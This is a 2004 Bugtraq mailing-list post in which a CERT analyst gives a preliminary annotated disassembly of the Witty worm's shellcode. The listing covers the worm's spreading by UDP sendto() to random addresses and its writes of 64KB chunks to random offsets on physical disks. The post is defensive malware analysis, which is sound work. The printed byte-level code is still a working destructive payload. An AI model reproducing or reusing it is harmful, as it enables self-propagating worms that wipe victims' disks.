| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 20 Mar 2004 18:38:55 +0100 From: Kostya Kortchinsky <kostya.kortchinsky@...ater.fr> To: bugtraq@...urityfocus.com Subject: Re: Any dissasemblies of the Witty worm yet? Here is some preliminary work, I don't claim it to be exact, since the API calls are guessed at the moment (I still have to get BlackICE), but it should give a pretty good idea on how the thing work. The WriteFile might be ReadFile (which is the way Symantec sees it in their analysis), but in my opinion the GENERIC_WRITE flag (and the fact the memory at 0x5e000000 might be code section, then not writeable) makes me think it writes arbitrary places of random physical disks - with the consequences one can imagine. Correct me if I am wrong, I would like to receive feedback about this. Regards, Kostya Kortchinsky CERT RENATER Nicholas Weaver wrote: > Has anyone done a dissassembly of the "Witty" worm yet? > > http://isc.incidents.org/diary.html?date=2004-03-20 > http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html > > using the > http://seclists.org/lists/bugtraq/2004/Mar/0181.html > recent bug in BlackICE/RealSecure? > > We are seeing a lot of activity from this worm, although even > a small infection would generate a LOT of traffic (a side-effect of > bandwidth-limited worms, such as single-packet UDP worms). > > Thanks. > seg000:000000D1 ; --------------------------------------------------------------------------- seg000:000000D1 seg000:000000D1 loc_D1: ; CODE XREF: seg000:000002ABj seg000:000000D1 89 E7 mov edi, esp seg000:000000D3 8B 7F 14 mov edi, [edi+14h] seg000:000000D6 83 C7 08 add edi, 8 seg000:000000D9 81 C4 E8 FD FF FF add esp, 0FFFFFDE8h seg000:000000DF 31 C9 xor ecx, ecx seg000:000000E1 66 B9 33 32 mov cx, 3233h ; 32 seg000:000000E5 51 push ecx seg000:000000E6 68 77 73 32 5F push 5F327377h ; ws2_ seg000:000000EB 54 push esp seg000:000000EC db 3Eh seg000:000000EC 3E FF 15 9C 40 0D+ call dword ptr ds:5E0D409Ch ; Probably LoadLibrary seg000:000000F3 89 C3 mov ebx, eax seg000:000000F5 31 C9 xor ecx, ecx seg000:000000F7 66 B9 65 74 mov cx, 7465h ; et seg000:000000FB 51 push ecx seg000:000000FC 68 73 6F 63 6B push 6B636F73h ; sock seg000:00000101 54 push esp seg000:00000102 53 push ebx seg000:00000103 db 3Eh seg000:00000103 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:0000010A 6A 11 push 11h ; IPPROTO_UDP seg000:0000010C 6A 02 push 2 ; SOCK_DGRAM seg000:0000010E 6A 02 push 2 ; AF_INET seg000:00000110 FF D0 call eax ; socket() seg000:00000112 89 C6 mov esi, eax seg000:00000114 31 C9 xor ecx, ecx seg000:00000116 51 push ecx seg000:00000117 68 62 69 6E 64 push 646E6962h ; bind seg000:0000011C 54 push esp seg000:0000011D 53 push ebx seg000:0000011E db 3Eh seg000:0000011E 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:00000125 31 C9 xor ecx, ecx seg000:00000127 51 push ecx seg000:00000128 51 push ecx seg000:00000129 51 push ecx ; sin.sin_addr.s_addr = INADDR_ANY seg000:0000012A 81 E9 FE FF F0 5F sub ecx, 5FF0FFFEh ; 0xa00f0002 seg000:00000130 51 push ecx ; sin.sin_family = AF_INET seg000:00000130 ; sin.sin_port = htons(4000) seg000:00000131 89 E1 mov ecx, esp seg000:00000133 6A 10 push 10h ; sizeof(struct sockaddr) seg000:00000135 51 push ecx ; &sin seg000:00000136 56 push esi ; s seg000:00000137 FF D0 call eax ; bind() seg000:00000139 31 C9 xor ecx, ecx seg000:0000013B 66 B9 74 6F mov cx, 6F74h ; to seg000:0000013F 51 push ecx seg000:00000140 68 73 65 6E 64 push 646E6573h ; send seg000:00000145 54 push esp seg000:00000146 53 push ebx seg000:00000147 db 3Eh seg000:00000147 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:0000014E 89 C3 mov ebx, eax seg000:00000150 83 C4 3C add esp, 3Ch seg000:00000153 seg000:00000153 loc_153: ; CODE XREF: seg000:000002A2j seg000:00000153 31 C9 xor ecx, ecx seg000:00000155 51 push ecx seg000:00000156 68 65 6C 33 32 push 32336C65h ; el32 seg000:0000015B 68 6B 65 72 6E push 6E72656Bh ; kern seg000:00000160 54 push esp seg000:00000161 db 3Eh seg000:00000161 3E FF 15 9C 40 0D+ call dword ptr ds:5E0D409Ch ; Probably LoadLibrary seg000:00000168 31 C9 xor ecx, ecx seg000:0000016A 51 push ecx seg000:0000016B 68 6F 75 6E 74 push 746E756Fh ; ount seg000:00000170 68 69 63 6B 43 push 436B6369h ; ickC seg000:00000175 68 47 65 74 54 push 54746547h ; GetT seg000:0000017A 54 push esp seg000:0000017B 50 push eax seg000:0000017C db 3Eh seg000:0000017C 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:00000183 FF D0 call eax ; GetTickCount() seg000:00000185 89 C5 mov ebp, eax seg000:00000187 83 C4 1C add esp, 1Ch seg000:0000018A 31 C9 xor ecx, ecx seg000:0000018C 81 E9 E0 B1 FF FF sub ecx, 0FFFFB1E0h ; 0x4e20 seg000:00000192 seg000:00000192 loc_192: ; CODE XREF: seg000:000001F8j seg000:00000192 ; seg000:00000255j seg000:00000192 51 push ecx seg000:00000193 31 C0 xor eax, eax seg000:00000195 2D 03 BC FC FF sub eax, 0FFFCBC03h ; 0x343fd seg000:0000019A F7 E5 mul ebp seg000:0000019C 2D 3D 61 D9 FF sub eax, 0FFD9613Dh ; 0x269ec3 seg000:000001A1 89 C1 mov ecx, eax ; rand() function, without the 0x7fff mask, shift coming afterwards seg000:000001A1 ; srand() done with GetTickCount() seg000:000001A3 31 C0 xor eax, eax seg000:000001A5 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:000001AA F7 E1 mul ecx seg000:000001AC 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:000001B1 89 C5 mov ebp, eax seg000:000001B3 31 D2 xor edx, edx seg000:000001B5 52 push edx seg000:000001B6 52 push edx seg000:000001B7 C1 E9 10 shr ecx, 10h seg000:000001BA 66 89 C8 mov ax, cx seg000:000001BD 50 push eax ; to.sin_addr.s_addr = (rand() << 16) | rand() seg000:000001BE 31 C0 xor eax, eax seg000:000001C0 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:000001C5 F7 E5 mul ebp seg000:000001C7 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:000001CC 89 C5 mov ebp, eax seg000:000001CE 30 E4 xor ah, ah seg000:000001D0 B0 02 mov al, 2 seg000:000001D2 50 push eax ; to.sin_family = AF_INET seg000:000001D2 ; to.sin_port = rand() seg000:000001D3 89 E0 mov eax, esp seg000:000001D5 6A 10 push 10h ; sizeof(struct sockaddr) seg000:000001D7 50 push eax ; &to seg000:000001D8 31 C0 xor eax, eax seg000:000001DA 50 push eax ; flags seg000:000001DB 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:000001E0 F7 E5 mul ebp seg000:000001E2 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:000001E7 89 C5 mov ebp, eax seg000:000001E9 C1 E8 17 shr eax, 17h seg000:000001EC 80 C4 03 add ah, 3 seg000:000001EF 50 push eax ; len = 0x300 + (rand() >> 7) seg000:000001F0 57 push edi ; buf seg000:000001F1 56 push esi ; s seg000:000001F2 FF D3 call ebx ; sendto() seg000:000001F4 83 C4 10 add esp, 10h seg000:000001F7 59 pop ecx seg000:000001F8 E2 98 loop loc_192 seg000:000001FA 31 C0 xor eax, eax seg000:000001FC 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:00000201 F7 E5 mul ebp seg000:00000203 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:00000208 89 C5 mov ebp, eax seg000:0000020A C1 E8 10 shr eax, 10h seg000:0000020D 80 E4 07 and ah, 7 seg000:00000210 80 CC 30 or ah, 30h ; 0x30 | (rand() & 7) seg000:00000213 B0 45 mov al, 45h ; 'E' ; E seg000:00000215 50 push eax seg000:00000216 68 44 52 49 56 push 56495244h ; DRIV seg000:0000021B 68 49 43 41 4C push 4C414349h ; ICAL seg000:00000220 68 50 48 59 53 push 53594850h ; PHYS seg000:00000225 68 5C 5C 2E 5C push 5C2E5C5Ch ; \\.\ seg000:00000225 ; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7 seg000:0000022A 89 E0 mov eax, esp seg000:0000022C 31 C9 xor ecx, ecx seg000:0000022E 51 push ecx ; NULL seg000:0000022F B2 20 mov dl, 20h ; ' ' seg000:00000231 C1 E2 18 shl edx, 18h seg000:00000234 52 push edx ; FILE_FLAG_NO_BUFFERING (0x20000000) seg000:00000235 6A 03 push 3 ; OPEN_EXISTING seg000:00000237 51 push ecx ; NULL seg000:00000238 6A 03 push 3 ; FILE_SHARE_READ | FILE_SHARE_WRITE seg000:0000023A D1 E2 shl edx, 1 seg000:0000023C 52 push edx ; GENERIC_WRITE (0x40000000) seg000:0000023D 50 push eax ; lpFileName seg000:0000023E db 3Eh seg000:0000023E 3E FF 15 DC 40 0D+ call dword ptr ds:5E0D40DCh ; Probably CreateFile seg000:00000245 83 C4 14 add esp, 14h seg000:00000248 31 C9 xor ecx, ecx seg000:0000024A 81 E9 E0 B1 FF FF sub ecx, 0FFFFB1E0h ; 0x4e20 seg000:00000250 3D FF FF FF FF cmp eax, 0FFFFFFFFh seg000:00000255 0F 84 37 FF FF FF jz loc_192 seg000:0000025B 56 push esi ; (saving socket) seg000:0000025C 89 C6 mov esi, eax seg000:0000025E 31 C0 xor eax, eax seg000:00000260 50 push eax ; FILE_BEGIN seg000:00000261 50 push eax ; NULL seg000:00000262 2D 03 BC FC FF sub eax, 0FFFCBC03h seg000:00000267 F7 E5 mul ebp seg000:00000269 2D 3D 61 D9 FF sub eax, 0FFD9613Dh seg000:0000026E 89 C5 mov ebp, eax seg000:00000270 D1 E8 shr eax, 1 seg000:00000272 66 89 C8 mov ax, cx seg000:00000275 50 push eax ; (rand() << 15) | 0x4e20 seg000:00000276 56 push esi ; hFile seg000:00000277 db 3Eh seg000:00000277 3E FF 15 C4 40 0D+ call dword ptr ds:5E0D40C4h ; Probably SetFilePointer seg000:00000277 5E ; (really not sure about this one) seg000:0000027E 31 C9 xor ecx, ecx seg000:00000280 51 push ecx ; 0 seg000:00000281 89 E2 mov edx, esp seg000:00000283 51 push ecx ; NULL seg000:00000284 52 push edx ; lpNumberOfBytesWritten seg000:00000285 B5 80 mov ch, 80h ; 'Ç' seg000:00000287 D1 E1 shl ecx, 1 seg000:00000289 51 push ecx ; nNumberOfBytesToWrite (0x10000) seg000:0000028A B1 5E mov cl, 5Eh ; '^' seg000:0000028C C1 E1 18 shl ecx, 18h seg000:0000028F 51 push ecx ; lpBuffer (0x5e000000) seg000:00000290 56 push esi ; hFile seg000:00000291 db 3Eh seg000:00000291 3E FF 15 94 40 0D+ call dword ptr ds:5E0D4094h ; Probably WriteFile seg000:00000298 56 push esi ; hObject seg000:00000299 db 3Eh seg000:00000299 3E FF 15 38 40 0D+ call dword ptr ds:5E0D4038h ; Probably CloseHandle seg000:000002A0 5E pop esi seg000:000002A1 5E pop esi ; (restoring socket) seg000:000002A2 E9 AC FE FF FF jmp loc_153 seg000:000002A2 ; --------------------------------------------------------------------------- seg000:000002A7 63 76 07 5E dd 5E077663h seg000:000002AB ; --------------------------------------------------------------------------- seg000:000002AB E9 21 FE FF FF jmp loc_D1 seg000:000002AB ; ---------------------------------------------------------------------------
Powered by blists - more mailing lists